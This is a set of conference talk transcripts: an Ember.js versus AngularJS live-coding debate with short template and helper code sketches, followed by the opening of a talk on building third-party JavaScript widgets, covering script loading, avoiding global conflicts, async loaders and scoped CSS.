that? Thanks Rob, I appreciate it. It's kind of like holding it up and powerling it. I'm just waiting. I'm completely avoided callback soup at this point, which is a good thing. Yeah, no callbacks at all. Just return the promise and Ember knows how to handle it. So that's what a lot of people think. Like if they're not from the JavaScript world, they look at some JavaScript code, it's just callback, callback, callback nested. Yeah, what are they like? It's like the V from hell. Yeah, callback help. So I'll put an H1 here for the title, the other attribute here is we have description and then we have some orders. So we'll just say like P description. And then to loop over all of these orders, I'll say each orders. And that's just handlebars code, right? This is just handlebars syntax. And then each side, each of these we have a macro. Did I say code? It's actually... If you learn handlebars, you have another entry for your CV. So another technology to learn. Well, and we require jQuery. 
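The model hook and template being built here come out to something like this. A sketch only: the /api endpoint and the title, description and orders fields are the ones served by Rob's node endpoint.

  App.ApplicationRoute = Ember.Route.extend({
    model: function() {
      // returning a promise is fine: Ember waits for it to resolve
      // before rendering the template with the resolved data as the model
      return $.getJSON('/api');
    }
  });

  <script type="text/x-handlebars" id="application">
    <h1>{{title}}</h1>
    <p>{{description}}</p>
    <table>
      {{#each orders}}
        <tr><td>{{number}}</td><td>{{description}}</td><td>{{price}}</td></tr>
      {{/each}}
    </table>
  </script>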
So it's like... Yeah, it's a win all the way around. There's a bonus for me this year. Okay, so we've got number and we've got description and I'll put in price here. Okay, and I'll just make this a UL. Actually, oh homie, I'm so sorry for what I'm about to do. Let's make this a table. We'll make this a table and we'll just put in a TR here and we'll say number and we'll say... This is what tables are for. Weird. I hate seeing this. You see this complain. Someone say, oh, someone used a table on a page for tabular data. That's kind of what they're for. I know. Tabular data. Just don't avoid them at all costs. Okay. So inside of here, I'll put another TR. And then we'll say TD. I think your tags are a little bit wonky. My tags are super wonky. Okay. Is that how you're supposed to do it with Ember? I just don't have a... Just do wonky tags and somehow I prefer... I'm not old enough for an IDE yet. Okay. And then we'll just close the table. Okay, so... Cool. There we go. So you can see we've got our table. The description, this is all being pulled from the local host, the server, basically all pulling it from a JSON API. Very nice. All right. Come on, Rob. Come on. I know. I know I've got that kind of sound now in my voice, but you're going to show us how easy this is. I keep hearing how powerful and easy Angular is to get started with, so I'm just waiting to see it. You're just a very good presenter. Ah, well, well practiced, perhaps. It's not that Rob runs a company that sells screencasts already. No, he has definitely not done any professional. He records them like 20 times and then picks the best one. That is some design power, my friend, right there. Wow. Okay. Those 99 designs. This is exactly. So let's work with some data. And so I'm doing that. I've got the same exact thing over here. So if I go to slash API, there it is. Boom. Okay. Isn't that just... Look at that. Don't you guys just want to be me? So let's go back over here and... All right. So the first thing I'm going to do is let's take out this about route so I can buy myself some real estate here. And inside my controller now, I am going to just do a simple HTTP call. So just like with everything in Angular, I need to latch on to something that will do that for me. So I need to take it in a dependency, HTTP. And so right off the bat, I will just say HTTP.get. There's my typing skill. See now, Peter, you've crawled inside my head. So the good thing is we were talking about, like, you know, how you can make more money doing this because there's more lines of code. And you see dollar signs everywhere which kind of reinforces that point. So I'm going to give this thing scope.api equals hpbi.get slash api. And that's it. Okay. So what are we doing here? What is the scope thing which you asked about? Scope is the thing that works between the controller and the template. It is the magical little transport vehicle for all things. You kind of prepare this little chunk of stuff and it's got functions embedded on it. It's got data embedded on it. I'll show you more in just a second. But this is basically, this is it. So now I've got scope.api and inside of here. I will do, let's see. So anyone else notice that all of the quote marks in this code are all closing quotes? Yeah. That just kind of really is... Yeah, what's up with that? Every time I'm looking at that, it's like, somebody's kicking in like, oh, closing quotes, what do you mean? Is that all? You see, it's totally irrelevant to the talk. 
You know, the quotes, you can see the code to the closing quotes. What's going on? What's going on? So far I can't actually tell the difference between this template and Ember other than you said to do a lot more typing. And there's no jQuery. I forgot I have to use... Wait, what is dollarHCP? Is that like dollarJQuery? Let's see. Why not just use jQuery? Dollar is money, remember? Yeah, right? Why reinvent the wheel? We all know how to use jQuery. Because Google didn't invent jQuery. So, what's the result? And is Rob going to blow it again? Yep. Oh, am I going to write URL? I'm blowing it. Let's see, home controller, am I doing this right? Simplice your home controller, home controller, home controller function. Maybe you forgot the TransClude function. I think you're right. Do I have this right? API. Yeah, that's the object should go straight in. Oh, that's right. No, but remember, if you're doing this at work, you're actually earning money while doing this part. Oh, I'm totally biffing this right now. I hope you bill by the hour. NGV was right. Trouble shooting, trouble shooting, trouble shooting. Do you think, is that what it is? Oh, I guess you're right. It shouldn't be. Oh, hey. Maybe we have a new expert. Maybe we should. Thank you. That's right, of course. I'm being lame. All right, so there we are. If only everyone was as pretty as Tom, right? Did I tell you I changed the data? No. All right. No. Okay, so all right, a little jet-leg craziness there. So now what I'm going to do is just use a UL tag. No, I want the table. I want the table. Let's see it. I want a table with a TR. I really want it. So this right here is called HTML. Yeah, I do like it. What you do with here, if you want to repeat everything you use, again, NG, repeat, just a regular NG tag, and so Angular works right on the DOM. So I'm going to say order in api.orders. And so inside of here, I will do, let's see, TD. And then do we know why they went with NG? Angular. Well, because that's Angular, but Angular starts with an A. Something like that. What was it? No order description? And price. Thank you. So it's, it almost looks kind of the same. Yeah. I'm going to do this. What did I do now? Jesus, thank you guys. So I'm giving a talk on Friday. Can you please make sure you're there? Bam. Okay, so there it is. But I hate to do this to you. Tell me. This price is really hideous, right? Don't you think? And this is not really a price. This is one of those things that I really like about Angular is it helps you in lots of fun ways. So what I can do over here is I can use a filter and I can tell it that this is, I believe, currency. Oh, look at that. Oh. Wow. Wow. That's nice. What's the, what's the, wow. What's your response to that then, Tom? And so here we got another one, order. What's the ordered, ordered, I think it's ordered at. Sorry guys. I'm going to just take a look at this API real quick. Purchased on, that's what I want. And, okay, so I have purchased on here and if I go back and doop, doop. So this is just a regular, all hideous date. But if I want to have it be a nicer date, I can just say date and then medium date. So refresh that. Oh, wowie, look at that. So Angular's got all kinds of stuff like this, like filters are one of the really cool things that it has. It's got things that allow you to just drop a search page in it. It's a fuzzy search over all this JSON data that you have. You can do currency, you can localize this. You can do all kinds of fun alternating silly things. 
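The Angular side of the same demo, sketched against the same endpoint. The api and orders names follow the demo, the purchasedOn spelling is assumed from the spoken description, and currency and date are Angular's built-in filters.

  app.controller('HomeCtrl', function($scope, $http) {
    $http.get('/api').success(function(data) {
      $scope.api = data;   // title, description and orders end up on the scope
    });
  });

  <h1>{{api.title}}</h1>
  <p>{{api.description}}</p>
  <table>
    <tr ng-repeat="order in api.orders">
      <td>{{order.number}}</td>
      <td>{{order.description}}</td>
      <td>{{order.price | currency}}</td>
      <td>{{order.purchasedOn | date:'mediumDate'}}</td>
    </tr>
  </table>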
So once you get past the initial like, oh, let's do a module and let's do a thing and whatever, that's when things kind of start to kick in with what Angular allows you to do. So you can easily create your own version to these filters totally from scratch. Bam, it's a JavaScript function, it works. All right, all right, all right, let's see. Take that. All right. What do you want, Peter? Do you want me to retort or do you want to hold on? Yeah, I want you to retort because I can just see like the way you pulled that cable out of his machine like, give him a hand. So that sounds nice, sounds really good. If you want your framework to be the all singing, all dancing, all everything, hopefully it provides really good currency formatting. What I'd prefer to do is rely on external library. I like to have, I like to keep my framework lightweight. I like to keep it focused on doing one thing really well and unfortunately I don't want to have to be the expert on currency or date formatting. So you like other people to do your work? Yeah. Oh, are you kidding me? I'm a programmer. So how about this? So how about I go find Accounting.js, which is a thing that I just Googled for, which I have never used before. So this will be quite the challenge and hopefully this will be your opportunity to get back at me, but hopefully Ember will have my back. No, I thought we were talking about Ember, but whatever. All right. So let me add, I'll call a new file called Accounting.js. Well while he's doing this, I will say that this is a big discussion in the Angular community is how much should Angular do. And a lot of people, especially the Node community, they really believe in small things targeted to do exactly what you need when you need them and they don't assume anything. So if you want to install a separate package to do a thing, you just do it. And so that's this kind of approach here that if you don't want all this formatting code to add to the bulk of Angular, then just go get the package that you need. So there's not a whole Google not invented here syndrome thing kicking in at all. Yeah, well, I don't know. It is Tom. He's kind of. Okay. So let me embiggen this so you guys can see. So I've got a, I've got an account. Did you just say embiggen? It's a perfectly prominent word. So I've got this helper. So what I'm just going to do, instead of mucking up all my HTML with this logic, it's a presentation. Well, that's not mucked up at all. No, that looks great. Let me just, don't look at the man behind the curtain, Rob. All right. So what I want to do is I'll just say ember.handlebars.helper. And what was yours called? Currency? Yes. Furncy. Furny and slip. And I'll just say return accounting.formatmoney.value. Okay. So if I have JavaScript. Okay. So if I have money over here, I'll just go into my template and I'll change price. I'll just say currency price. And now it's formatted. Nice relying on external library. And what's actually really cool about this Handlebars library is that's live updating. So if I ever have any UI or code in my application that goes and changes that underlying value, that small little Handlebars helper that we wrote will actually update automatically without any code from you. Actually, sorry. No, I was just intrigued. Who, like, the audience thought, like, just in that tiny piece? You know, who kind of won the argument there, do you think? Do you think it was Rob or do you think it was Tom? Clap if it was Tom. And Rob. Oh, I'm seeing a theme coming out here. 
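The helper Tom registered is roughly this, leaning on the accounting.js library he pulled in. Because it is registered as a bound helper, it re-renders whenever the underlying value changes.

  // usable in templates as {{currency price}}
  Ember.Handlebars.helper('currency', function(value) {
    return accounting.formatMoney(value);
  });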
Which is kind of a shame because I was totally biased going into this, but Tom's doing a good job here. I've got a, you know, and I've actually got a challenge to throw back that will totally nuke Rob, but I'm actually feeling kind of charitable here. I don't think I should do it. Have you got any coming the other way? I don't think I should do it. Okay. I don't. I mean, do it already. All right. All right. All right. All right. Well, what would happen? We have a TR inside of our table, right? So we have a table. What? I'm just using the library API. Presumably, you could wrap it as an AMD module and then just require it as needed. The question was, it seems bad that you have this accounting global. I didn't write the library, but like I said, I think you could wrap it in AMD if you wanted it more modular. Okay. So let's imagine that I wanted to break this up into two rows. So I want maybe the description on the first line and then after it, I want to do a separate TR. So I basically want two TRs inside my each. And I'll just move the currency down here. So basically now what we're saying is for each of these orders, instead of just one TR, we actually want to have two TRs. And if I reload the page, this is what that looks like. It seems pretty easy. Wow. You've been beaten there, Rob. Yeah. What are we doing? So basically each item, you have two TRs instead of one. This is such a subtle thing, but you can see the sweat starting to come out on this one. No. Well, I did want to talk about directives, but that's... Oh yeah. No, we can do directives. It's fine. Yeah. No, that's... Restrict, restrict, EACM, TransClude, linking function, dollar scope, islet scope. Next time I... So really go ahead and practice your English, like learning angrily. Learn always complicated words. Next time I come up with the idea for a cage match, do not go up against the writer of the library. I did that last year and I got waxed. Okay. So you want two TRs? Two TRs. All right. Toddlers and TRs? Maybe that's American. So that doesn't work for you right there? No. It's not... Is that good? No. Not exactly what I was looking for. All right. So let's see. Yeah. This was good. You sprung up. We didn't talk about this. Oh, sorry about that. All right. It's fine. It's fine. What's the stuff you wanted to get back to that you briefly mentioned? No, I'm going to try this. I'm going to try this. So app.directive... Let's see. Tom, crap. So I'm going to make this... I'm going to make this an element. God, if I pull this off, this would be crazy. I'm buying all your beers if you do this. Thanks. All right. So here's the thing. I have a choice right now. I have to explain directives in two minutes. So directives share a scope with a controller. And so when you use a directive, use it within the scope of a controller. And so they will share a scope. So that means I can share data now. And so I should be able to format it and do this, and this should work, ideally. And you can tell it that you don't want to share a scope, and directives can have their own scope. And I just wanted to point this out really quickly, because I was going to do a demo on this. I think it's incredibly important. But anyway, you come in and just tell it, here's your scope. You're isolated now from your controller, but I'm not going to do that. So what I'm going to do is I'm going to tell it, your template is that... This is the thing I was worried about. Got a multi-line string support in... HTML and JavaScript. Is that a best practice? 
I used to do this in, like, 1999. Get that snow effect going, you know? Document.write. This is the thing, man. I was just sitting here stressing over this, like, they're not going to... All right, so let's see, order price. I'll leave everything just the way it is. Now, this brings up the next thing. When you're using directives, you are still working with the Angular engine, the Angular templating engine. There's nothing different that I just did right here, except to move the code right in. So I don't have to say, oh, do this and do that, blah, blah, blah. So I want to point out, God, if this works, I'm going to be so blown away. Didn't we say earlier that using direct HTML was a lot better than using embedded templates? Yes, you did. I like writing that tag. Like I said, you pull us off all the beer in Norway. That's like $1,000. No! Crushing! Let's see. Let's see, what is it? Medium date. I'll tell you what, it's just... That was actually, that was a useful error message. It said, unterminated quote. Oh, okay. There you go. That was a good error message. Thank you. That was good. Shit! Crises, I'll tell you, I could probably, did I just swear? Sorry. We'll bleep it out. You know, I just... It's not a screencast. We can't edit it wrong. That's true. There's ways to do this and I can't think of what it is. Yeah, no, it's really hard. That's why I asked. All right. Next year, I think the Cage match is going to be Hawaii versus San Francisco. All right. I think we know who will win in that one. That's right. Yeah. Who's got the better tan? Actually, you got the spray on stuff. Yeah, I got the spray on. I just flew through New Jersey. So, they actually have them right there in the airport. So, you're not probably feeling quite so great at the moment. Well, you know, I'm sitting here thinking about it as I'm trying to make fun of Tom, that would be the best course of action. No, I'm trying to think like, I know there's a way to do this and I can't think of it off the top of my head. I know you can pass in things. I could pass in the order somehow. I mean, I know there's a way to do it, but it's not straightforward like what you just did. So, it turns out that actually having a templating language where you can do concepts like this ends up being a very useful thing. Yeah, absolutely. Okay. So, we're going to go to some Q&A, but the first thing, just before we do that, I want to diffuse the atmosphere on stage a bit. And I want you to both say something nice about the other one's framework. So, I'm going to start with Tom. If you have to say something nice about Angular in this context of this whole cage match, what would you say? Sure. So, unfortunately, one thing that we didn't get to during the cage match where you probably would have completely decimated us is Angular has a really fantastic testing story right now. Yeah. And that's something that I think they feature very prominently on their webpage. And I think that's really great. Now, I think architecturally we could support it, but right now we definitely don't make, we don't do a good job of making it one of the first things that you think about when you get started. So, in the same way that we make you think about URLs up front, I think Angular does a really good job of making you think about testing up front. And I think I'd like to copy that. Yeah. It's a verbal hug, isn't it? No. No. Spirit is really scratchy. Back from your point of view. 
Well, my biggest criticism of Ember has always been that the API is difficult to understand. For me, it's just, because I only have what, 10-second attention span, and if I don't get it, forget it. No, but once you do get it, it's fascinating that all of, as you saw Tom do, once he got it set up, you're able to start going, and you don't have to, like, you saw me go back and, oh, I got to change this. One thing he didn't do, which he would have nuclear crushed me, is now minify your code and everything would have broken, because the minifier will absolutely destroy the injection, and then, but you have to go back and then rewrite the way you did it. So you find that a lot in Angular. With Ember, you just follow their conventions and you keep moving on once you know the conventions, and it builds out really nicely. Okay. So, the absolute worst time in a conference, you can ask the questions, just before lunch. But we're going to do it anyway. If you want to ask a question, say who you want to answer the question and then go with it. I'll try and repeat the question as well. So, is there anyone? How would you test the JavaScript application that you're, what, writing? Yeah. Yeah. Did you want to? Sure. Well, that's, as Tom was saying, that's one of the benefits of using Angular is that the testing story is amazing. It's a framework called Karma, and what it does is fascinating. It runs Node.js on the server and it will actually take your JavaScript client code, stuff it in a node, and run it, and it will actually apply it to a bunch of different browsers. All, you can do a headless browser, you can test it in IE, you can do all this stuff, and it's all done virtually using the testing framework. There's a bunch of frameworks out there that you can use if you don't like the all-encompassing Karma thing, like Jasmine's really good, and it takes a bit of getting used to, but you can do it. So, I thought I would show you with just a quick example. This is a little music player. I teach an Ember training class in the States, and this is the application. It's a three-day course, and over the three days, this is the application we have people build, and I think what's really neat about this is that we actually have them do this test first kind of thing. So basically, this is the running application. You can click around. There's music. You can click the play button. I don't know if you can hear that. It's pretty neat. But anyway, if you just say test equals one, you can see we break these tests down into these different steps that you go through. So if I say go up to step 15, this is actually Q-unit, and what's really neat about this, shut up, the tests actually play the song. So this is like a full-blown integration test, and the tests are actually controlling the application, which I think is really neat. And if you scroll down to the bottom of the test runner, you can see that it's still like a fully functional application. So I think that's really neat, and I'll just show you real briefly. I prefer Q-unit. I like the simplicity. I like Urn. The maintainer is very responsive, which I think is awesome. But our tests just look like this. Let me make this a little bit bigger. I've got to say, as a Brit, calling something bomb box is the whole nice hilarious thing I've ever seen. I know no one else would pronounce it that way with the umlaut and everything. So these are our steps. This is like step one, and you can see we just have these. I think I have one that's pretty cool. 
So this is like testing a view in isolation. It's like some test view helpers we have, and it basically does this asynchronous testing. So that's how you test an Ember app. Okay. Anyone else? Yep, up here. So he's asked, yeah, we're stressing that these things are easy to learn, but is that the most important thing? Are they more important things to it, just being easy to learn, like being easy to maintain, and so on? Well, I think it doesn't matter how easy it is to maintain. If it's not easy to learn, no one's going to write it. The thing you have to keep in mind is that as someone who's making an open source project, putting it out on the web, you guys are really busy. And it's not like something like iOS or Android where you're going to learn the SDK no matter what because there's a pot of money at the end. On the web, it's really a more open ecosystem. So if I want to compete at all, I have to show you quick wins within the first five, ten minutes because if you don't see quick wins, you're going to bail, right? So I agree. And actually, that's for me why we spent so long building Ember is because maintainable applications are so important and having good conventions so that you can scale an application out to be bigger in features and bigger in team size, very, very important. But if we're not easy to use, no one's going to care. Yeah, just to add to that really quickly. To me, the ease of use of an API is really important. It's one of the reasons I like Angular is it kind of eases you into the concepts so you understand. So it's really important for what you're doing, the dependency injection, aha, I get it. So when things get a little more complicated, you can remember what was easy to begin with. But yeah, as things go on, nothing's easy. It's programming. Okay, technically we're out of time. But if there is one more, then we could take one more. Is that it? I don't think there is. That's good. Okay. Thank you guys. I enjoyed it, guys. Thank you. Bye.
|
This is a battle between EmberJS and Angular. Tom Dale (project lead for EmberJS) vs Rob Conery (Angular). The fight is hosted by Peter Cooper.
|
10.5446/51522 (DOI)
|
Hello, everyone. Welcome to this talk. I'm going to be talking about building third-party widgets and APIs using JavaScript. I'll just start by saying a few things about myself. That's me in the picture right there on the right, a three-year-old playing around with my Commodore 64. My name is Thorsten Björnstapp. I work as a .NET consultant at Webstep here in Oslo. I consider myself a web developer. I've been working a lot with the .NET stack, but the past few years I've been doing more and more work on the web side of things. You might be saying, I assume most of you know JavaScript. Yeah, you know what I mean when I say JavaScript, but third-party JavaScript, what is it really? I think of it like this: the first party is the person using the web browser, looking at the web page and just using your page. And the second party, that's you guys, when you create websites for other people. So you write JavaScript running on a page, you know the environment that JavaScript is going to run in, and you know the other scripts on the page. And then you have third party. Third-party providers of JavaScript don't know anything about the page their JavaScript is going to be displayed on or run on. So they're usually loaded from a different server, and they're probably updated independently of the actual web page the JavaScript is running on. And you don't know which frameworks are loaded on the page, and you can't really assume anything about the page the JavaScript is going to run on. Examples of third-party widgets can be, for instance, the Facebook widgets. There are a bunch of different Facebook widgets that are displayed on newspaper pages and everything. And they use your cookies when they're displayed, so they can show you information about your friends and what your friends have said about the current page. Then you have widgets like, for instance, the Disqus widgets that you have probably seen on web pages or blogs or newspapers and such, in order to discuss the content of the actual page. They give a quite powerful, threaded discussion model with avatars and everything. And they also have an admin panel where you can go and censor some posts, delete posts, and see everything about the status of the widgets. And then you have, for instance, the Twitter widget that was supposed to be displayed on the page right now, but it's not. But I guess you've seen it a lot of times. It's typically the widget where you display a list of tweets, like the one on the big screen out in the hall, where you can see either all tweets regarding one search or one subject, or all tweets for a person. And you also have more plain API third-party JavaScripts, like Google Analytics, that don't really modify the DOM. They just provide a JavaScript API that you can use to report analytics back to Google so you can see everything there in the admin panel in Google Analytics. So in this talk, I'm going to be talking about how you can go about it if you want to create a JavaScript widget of your own. This talk has three main sections. The first is just getting onto the page and loading your first JavaScript file. The second section is about modifying the DOM, how you can actually display content to the users, hopefully without destroying the page you're actually on. And the third part is getting data, sending data back to the server, and the security concerns regarding communication with JavaScript. So to start with, loading scripts.
The first and hardest part, or the natural point to start when you want to run JavaScript on someone else's page, is to get the script actually onto the page. And the most important thing here is you don't want to break the page. If someone puts your JavaScript on a page and it actually destroys the page or makes it unusable, that's bad. So do not break the page at all. You have to be really careful when loading stuff. If you load any frameworks or libraries, you need to know: are they maybe already running on the page? Will they conflict? How about the versions? And for instance, you don't want to do JavaScript alerts, and you don't want to do console logs, as in some versions of Internet Explorer they will just fail. You can, for instance, just hope jQuery is there and will work: you can say the page must have jQuery loaded in order to use your widget. But then again, there are a bunch of versions of jQuery. It might be modified. It might have some plugins loaded into jQuery that won't work for you. And you can't really just load jQuery yourself either, because those plugins that the page required might not work with your version of jQuery. So you've got to be really careful when loading jQuery. Maybe you can't really load jQuery at all, depending on the case. So there are a few things you can do, because you probably need to load some libraries in order to run on the page, and you have to avoid conflicts with the scripts that might be running on the page. The first thing is globals. You want to keep globals to a minimum, preferably no global variables at all. And if you need any, you can probably limit yourself to just one global variable. If you're creating an API, you probably need one global variable, so you can just use that. When you're loading JavaScript and doing things on the page, use closures and immediately invoked function expressions in order to keep your variables from registering in the global scope and maybe overriding some values that are already there. If you want to load scripts, take a look at scripts supporting noConflict. You have, for instance, jQuery, Underscore, and Backbone. They have a method called noConflict, so after the scripts are loaded, you can call noConflict and they will remove themselves from the global namespace and restore the variable to its original value. That way you can just load jQuery, call noConflict, and keep a reference to the version of jQuery that you loaded, while the page will still see the original version of jQuery. Just be careful when loading scripts like jQuery asynchronously while the page is loading plugins at the same time, as those plugins might register on your version of jQuery instead of the page's own version of jQuery. So if you're loading scripts, you should try to wrap them. For instance, require.js has an option for adding a wrapper around a script file. So when you do the optimizing build in require.js, it will hide the global scope from the script. Unless the script explicitly declares that a variable should be added to the window object, it will be added to your namespace instead. And in some cases, you might need to modify the scripts in order to have them not register in the global namespace. And if you're using require.js, you've got to be aware that the variables define and require, which require.js defines, will also be in the global namespace by default. There you have an option as well to put define and require into your own namespace, so you can just use the one global variable.
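As a sketch of the two techniques just mentioned, an immediately invoked function expression so nothing leaks into the global scope, and noConflict to keep a private copy of jQuery, assuming the widget has just finished loading its own copy of jQuery:

  (function () {
    // passing true also restores the page's original window.jQuery,
    // so the page keeps whatever version and plugins it had before
    var myjQuery = jQuery.noConflict(true);

    myjQuery(function () {
      // widget code goes here, using myjQuery; no globals are created
    });
  })();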
And also when you're loading your own scripts, I recommend using some script loader like require.js so you won't have to put all your constructors and other factories and such into the global variable that you have. Because then other people might start to use your internal or private variables and you will have a hard time updating your scripts or changing your APIs later. So the best thing is if you are to put something into the global namespace, make sure that you only expose your public functionality. And another thing is you don't want to affect page load times. If your server goes down when someone references a JavaScript on your server, that's not really too bad. Because if your server is down, they typically get a 404 and the page just continues loading. The bad thing is if your server is overloaded for some reason, maybe someone including your script pulls something about just a be-brand, you get a lot of requests, then you start to reply really slowly to requests and things might start to block. So if your scripts load really slowly, that's bad. For instance, if your scripts are big, that's bad as well because the users will wait a long time for the scripts to download. And what happens when you deploy updates to your application and if your application pooled the recycles, then the next request might take some longer time to actually complete and the users will have a frozen page as well. So the big goal is that page should always just load as normal as possible and then your script should just load in addition to normal behavior. So I made an example application here. It's quite fancy, I think. These are some pictures of animals. And as you see, as soon as I refresh the page, all the pictures are grayed out. And then when I mouse over, I get this sweet pop-out effect. So I made this, I want to put it on Reddit or something, and then I want to visit the counter so I can see how many people have actually seen the page. So I made a very simple widget so I see how many people have visited this page. And you see, this doesn't really affect the page. The page shows up, the images show up immediately, and they're grayed out. And here I'm using a simple script tag, just like you would include, for instance, jQuery or something. And this works for the perfect case. The script serves quickly and the widget loads and everything is fine. But the problem is if this script takes a bit long to load, the page loading will block until the script has loaded and parsed and completed running. So you should at least put the script towards the bottom of the page. So at least the images will display and things will look quite nice for users. But you will notice that document ready will not trigger until your script has loaded or failed loading. So then we'll get the case where the images load, but they don't get grayed out because that's the JavaScript that's set to run on document ready. So let me see here. So this is the case. You see now I've created some delay when loading the script. And now you see the page loads and then a second later or so, one and a half seconds, then the widget loads and it displays the visitors. But until that happens, you see the images don't get grayed out and something looks off to the user. So you might think this can be solved by caching the script on the page or caching the script on the client. Then it would take just as long to load the first time, but at least it would be slow or at least it would be faster on reloads and when the user clicks on. 
It's not too bad if the visitor counter doesn't really display the correct value at all times. So we could cache the script for maybe a short while. But then we have the problem with updates. If we find some critical bug on some client's page and we really need to update the script and push it out to all the clients, then it's a problem if users have actually cached the script. So we need to find some solution. So the solution to actually enabling caching of the script is to use some sort of JavaScript loader. And it's quite simple, actually. We just, instead of loading the script directly on the page, we just add a reference to the loader and then when the loader is loaded, it has a reference to a version URL of the script. So loader in this case gets script version 15. And then it goes out, gets the script, and has the script to the page and then it's run. Then the script can be cached for, say, a year. So as long as the loader is never cached, the script can be cached forever. And then whenever you release a new version of the script, you update the loader to version 16 and things work. And of course, this won't help with if the server hosting the loader is low, but at least you'll solve the case with your script getting bigger. If you have included jQuery or backbone and lots of scripts and it's maybe half a megabyte, it's a good idea if you're able to cache it. So look at this example now. Now we see the page opens, the image is displaced, and they're grayed out immediately. And a while later, the counter is displayed at the bottom. So now we have the loader loading immediately, document ready is firing, and then one and a half seconds later, the script is loaded. So the loader is quite simple and you only need a couple of lines of code, so it will be quite fast to serve. And you can keep it in memory on the web server or something, put it on a CDN, so it will get served quickly. So you basically just create a script tag, set the source of the script tag, and then add it to the document. And as soon as the script tag is added to the document, it will get downloaded by the browser and then executed and run. And here you also see an example of the immediately invoked function expression that wraps the whole script, which prevents the script variable and the S variable from leaking out into the global namespace. So this script leaks no variables into global namespace. Yeah. Yeah. So I'll get back to that again. So as I mentioned on the previous slide, this is still a problem if the server with the loader is nonresponsive. So again, back to the example. Now we see the same, or actually it's worse than it was, because now we take one and a half seconds to first get the loader and then the loader adds the script before the counter appears at the bottom. So this doesn't really seem to have solved anything. But we can fix that as well. I'll get back to that. So you might be wondering why does script loading have to block the DOM anyway. For instance, in this case, it would be okay if document ready were to run and everything were to run because my script can run at any time, even after the page has loaded. And the answer is, of course, document write. Document write was included in JavaScript from way in the beginning. And it lets you write to the DOM exactly where the browser has come in the parsing. 
So if the browser, it starts at the top, starts parsing the HTML and then finds the JavaScript, if the JavaScript contains the document write statement, that will be written to the exact same point that the browser is at at the moment. And document write can add HTML, JavaScript, CSS, or anything to the page. So it might write something that will affect the rest of the parsing and the rest of the rendering of the DOM. So just in case, even though your script might not even include a document write statement, the browser has to stop, download the script, parse the script, run it. Normally afterwards, can it really be sure that nothing happened or at least it doesn't really care, then it can just continue parsing. So it would be nice if there's a way to say to the browser, don't care about document write, just load my script and run it. That's when we got the async keyword. We actually got the defer keyword in HTML4, which had logic that a script marked as defer would be loaded in order, or they would be loaded in parallel and then run in the same order. Async, which we got in HTML5, says just load the script and run it whenever it completes. So no matter if you're loading a big script and a small script, the small script will probably run before the big script. And of course, this is not supported everywhere, unfortunately. But we can get the same behavior using an async loader script. So we're getting a bit into inception here. This is instead of putting the script tag into your page, you put the script block into the page. You might have seen something like this for Google Analytics instead of inserting a script tag for the Google Analytics script. You're supposed to insert this weird big script block in your page instead. But the big advantage of this is that it will always get loaded asynchronously, independent of the browser. So what it does here, as I mentioned earlier, it just creates the script tag, sets the source, and also you should set the async attribute. As some browsers might stop parsing the page when it encounters the script tag if the page hasn't completed parsing already. So by setting the async property to true and adding the script dynamically like this, we're guaranteed to get async behavior when loading the script. So unfortunately, it's a bit ugly to say to everyone wanting to use your script that you have to put in these eight lines of JavaScript or how many it is on your web page. But that's just how it is. So if you go to the Google Analytics documentation, you will see, just put this script block in your code and it will work. So one thing when you get to loading is that you want to do loading right early. You want to get your loaders and the sequence of doing the async loading of the loader script and then doing the async loading of the main script. You want to get that right in your project right from the beginning because this is very hard to change later. As soon as someone has put in some script types for your script on their pages, it's really hard to get them to change that or update that later. And in the worst case, you will have to maintain separate versions of your script in order to support both the asynchronous loading and the synchronous loading. So if you just concentrate on getting the loading right early on and getting some code running on the consumer's page, then we can get working because now you have full power over the page. So over to displaying stuff. 
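To summarize the loading section, here is a rough sketch of the kind of async embed snippet described above, similar in spirit to the Google Analytics snippet. The URLs, file names and version numbers are made up; the point is only the shape of the pattern.

```javascript
// Sketch of an async embed snippet a consumer would paste into their page.
// The loader URL and file names are illustrative, not a real service.
(function (d) {
  var s = d.createElement('script');
  s.src = 'https://widgets.example.com/loader.js'; // short-lived cache, tiny file
  s.async = true;                                  // never block page parsing
  var first = d.getElementsByTagName('script')[0];
  first.parentNode.insertBefore(s, first);
})(document);

// loader.js then appends the long-cached, versioned script in the same way:
// var s = document.createElement('script');
// s.src = 'https://widgets.example.com/widget-v15.js'; // cache for a year
// s.async = true;
// document.getElementsByTagName('head')[0].appendChild(s);
```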
When you have scripts running on the page, you can just do whatever you are doing normally. You can, for instance, if you have reference for jQuery, you can add the, or use it to find DOM elements, add DOM elements, do anything. And you can also do that with just plain JavaScript APIs. And often the last option is often better because that's few dependencies that you need, especially on something as big as jQuery. It's better to add a few dependencies. So, yeah, when you want to put something on the page, just render it. But do not mess up the page. If you just want to show something simple like the visitor counter I showed you, then it's easy. Just put in an element with a screen on the page. But if you want to do something more fancy like the Facebook widget or the Twitter widget, you should be aware when you are starting to add CSS and start to the page. So you can load CSS on the page the way you normally add CSS on the page by actually rendering and you link tag to the page, set the href to the script or to the starsheet, and then just add it to the HTML. Then the starsheet will get loaded and apply to the page. Just be aware that you do not want to modify the styling of other elements on the page. So this is best if all the elements you are rendering on the page are put into one element, just like you want to put all the JavaScript variables into one global JavaScript variable. And then you can scope your CSS to just apply to elements within that one element with one given ID or class. So that will be your global variable in the HTML or in the DOM. And here is also nice to use something like less or less in order to create nested CSS. Nested CSS might get a bit ugly, but at least you will be able to create one global element, so to say, and then put everything under that. So it's a lot easier to modify the CSS or perhaps if you need to change the ID or the class of the one element. And you will also encounter cases where the scripts or the styles on the page will affect the styling of your elements. And then you will need to add explicit styling to your elements to override that. And then you will have to play around with specificity and create really specific CSS rules that sets the font size to whatever you want, the padding, margin and everything, even though you won't probably need it on your test page, but suddenly you have some consumer doing something weird with some weird rules and adding a padding to all divs, and then you have to override it. So one option here is to use iframes, and I will get back to that. And an optional problem or challenge is to not be affected by styling at all on the page. So no matter what the user or the owner of the page does, your script won't be affected. And one good example here is, for instance, the Facebook widget. The Facebook has very strict branding. Everything is the same blue color, same font, same buttons. And you won't be able to change the blue color to red or do anything weird with the widget or change the like button to just a normal link, fooling users into clicking it. So if you want to do that, you have to make something more interesting. You can just try to set more specific rules if it isn't that important, but if it's really important like the Facebook widget, you need to do something else. So one kind of neat thing is sourceless iframes. I read about sourceless iframes only a while ago, and I thought they were pretty cool because they let you create a sandbox inside the DOM for styles. 
